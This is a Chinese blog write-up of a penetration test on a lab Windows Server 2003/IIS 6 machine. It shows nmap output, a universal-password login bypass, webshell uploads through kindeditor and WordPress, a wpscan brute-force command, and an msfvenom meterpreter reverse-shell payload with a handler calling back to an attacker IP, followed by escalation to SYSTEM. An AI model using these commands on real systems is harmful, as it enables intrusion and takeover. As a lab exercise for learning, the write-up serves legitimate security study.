记一次对2003 企业版的测试

前言

靶机:IIS 6.X + MSSQL 2008 + php 5.2.17 [ 以iis服务权限运行 ] + mysql 5.1.x
本机:kali 2019
感谢@klion提供环境
深刻感受到靶机与实战的区别

开搞

测试一下

nmap 测试一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@kali:~# nmap -T4 -A -v 192.168.3.5
PORT STATE SERVICE VERSION
23/tcp open telnet?
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT POST
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: \xBD\xA8\xC9\xE8\xD6\xD0
| http-webdav-scan:
| WebDAV type: Unknown
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Type: Microsoft-IIS/6.0
|_ Server Date: Tue, 17 Sep 2019 06:36:59 GMT


点击查看更多
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
81/tcp   open  http          Microsoft IIS httpd 6.0
| http-cookie-flags:
| /:
| ASPSESSIONIDCCSBTCQS:
|_ httponly flag not set
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT POST MOVE MKCOL PROPPATCH
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Fyblogs\xD0\xC2\xCE\xC5\xCE\xC4\xD5\xC2\xCF\xB5\xCD\xB3
| http-webdav-scan:
| WebDAV type: Unknown
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Type: Microsoft-IIS/6.0
|_ Server Date: Tue, 17 Sep 2019 06:37:00 GMT
82/tcp open http Microsoft IIS httpd 6.0
|_http-favicon: Unknown favicon MD5: C8F6FEA978F73DF79ECF0134FA2129DB
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT POST MOVE MKCOL PROPPATCH
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
| http-ntlm-info:
| Target_Name: IIS6CN
| NetBIOS_Domain_Name: IIS6CN
| NetBIOS_Computer_Name: IIS6CN
| DNS_Domain_Name: iis6cn
| DNS_Computer_Name: iis6cn
|_ Product_Version: 5.2.3790
| http-robots.txt: 11 disallowed entries
| /Admin/ /App_Data/ /App_Themes/ /bin/ /Images/
|_/Install/ /Skin/ /Temp/ /Template/ /Print.aspx /Web.config
|_http-server-header: Microsoft-IIS/6.0
| http-title: \xE7\xBD\x91\xE7\xAB\x99\xE9\xA6\x96\xE9\xA1\xB5-\xE5\x8A\xA8\xE6\x98\x93\xE7\xBD\x91\xE7\xBB\x9C
|_Requested resource was http://192.168.3.5:82/(S(0re5syy1ktjgm145wqtzvp55))/Default.aspx
| http-webdav-scan:
| WebDAV type: Unknown
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Type: Microsoft-IIS/6.0
|_ Server Date: Tue, 17 Sep 2019 06:37:00 GMT
83/tcp open http Microsoft IIS httpd 6.0
| http-cookie-flags:
| /:
| ASPSESSIONIDCCSBTCQS:
|_ httponly flag not set
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT POST MOVE MKCOL PROPPATCH
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: ASP\xCC\xBD\xD5\xEBV1.93\xA3\xAD\xB0\xA2\xBD\xADhttp://www.ajiang.net
| http-webdav-scan:
| WebDAV type: Unknown
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Type: Microsoft-IIS/6.0
|_ Server Date: Tue, 17 Sep 2019 06:36:59 GMT
84/tcp open http Microsoft IIS httpd 6.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT POST MOVE MKCOL PROPPATCH
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: phpinfo()
| http-webdav-scan:
| WebDAV type: Unknown
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Type: Microsoft-IIS/6.0
|_ Server Date: Tue, 17 Sep 2019 06:37:00 GMT
85/tcp open http Microsoft IIS httpd 6.0
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT POST MOVE MKCOL PROPPATCH
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
| http-robots.txt: 5 disallowed entries
|_/ /admin/ /documents/ /images/ /passwords/
|_http-server-header: Microsoft-IIS/6.0
| http-title: bWAPP - Login
|_Requested resource was login.php
| http-webdav-scan:
| WebDAV type: Unknown
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Type: Microsoft-IIS/6.0
|_ Server Date: Tue, 17 Sep 2019 06:36:59 GMT
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2003 R2 3790 Service Pack 2 microsoft-ds
1028/tcp open msrpc Microsoft Windows RPC
1433/tcp open ms-sql-s Microsoft SQL Server 2008 10.00.1600.00; RTM
| ms-sql-ntlm-info:
|_ Product_Version: 5.2.3790
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2019-09-17T03:37:13
| Not valid after: 2049-09-17T03:37:13
| MD5: 7ab5 0f37 b867 a9ec 3304 cad9 bf7f 878f
|_SHA-1: 328c c184 6562 b4d9 ed78 6599 5dee e4a9 e77f 2309
|_ssl-date: 2019-09-17T06:37:50+00:00; -1s from scanner time.
1801/tcp open msmq?
2103/tcp open msrpc Microsoft Windows RPC
2105/tcp open msrpc Microsoft Windows RPC
2107/tcp open msrpc Microsoft Windows RPC
3306/tcp open mysql?
|_mysql-info: ERROR: Script execution failed (use -d to debug)
3389/tcp open ms-wbt-server Microsoft Terminal Service
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
| http-methods:
| Supported Methods: GET HEAD POST PUT DELETE TRACE OPTIONS
|_ Potentially risky methods: PUT DELETE TRACE
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat

23端口

暂无信息

81端口 Fyblogs系统

开着一个Fyblogs新闻文章系统,随便瞎点,诶感觉有东西
1.png
绕了半天waf(太菜)无果
发现一个登陆后台admin:admin登陆进去了,验证码也没有作用
2.png
再次测试发现登陆框存在万能密码'or'='or',百度了一下发现还有目录遍历问题不大。
通过目录遍历发现kindeditor编辑器和版本3.5.1
3.png
通过修改fileHZ参数.jpg可以将jpg改为我们的asp马儿
4.png
5.png
上蚁剑
6.png
权限太小了,无法执行命令。
换一下个目标

82端口 动易网络

开着一个动易cms 3.5
7.png
在网页底部发现管理登录入口
8.png
通过百度知道默认账号admin,密码未知
9.png
猜测管理认证密码8888,枚举密码
10.png
12.png
在后台上传aspx马儿
11.png
权限更小,只能看,连接不上

83 asp探针

看见一个asp探针
13.png
3389登录试试
14.png
administrator:admin,登录进去了。0.0

87端口 wordpress3.1.4

15.png

1
2
root@kali:~# wpscan --url http://192.168.3.5:87 --enumerate u
[+] admin

枚举一波

1
2
root@kali:~# wpscan --url http://192.168.3.5:87 -U admin -P /usr/share/seclists/Passwords/cirt-default-passwords.txt
| Username: admin, Password: ADMIN

后台可以直接写马儿
16.png
写入404文件中,蚁剑连接,上传后门
17.png

提权

执行一下后门

1
2
3
4
5
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.3.10 lport=4444 -f exe -o test.exe
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.3.10
msf5 exploit(multi/handler) > exploit

简单提权

1
2
3
4
meterpreter > getsystem 
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin))
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

到此结束

如有错误请联系lanbaidetanlang@qq.com

文章目录
  1. 1. 前言
  2. 2. 开搞
    1. 2.1. 测试一下
      1. 2.1.1. 23端口
      2. 2.1.2. 81端口 Fyblogs系统
      3. 2.1.3. 82端口 动易网络
      4. 2.1.4. 83 asp探针
      5. 2.1.5. 87端口 wordpress3.1.4
    2. 2.2. 提权
  3. 3. 到此结束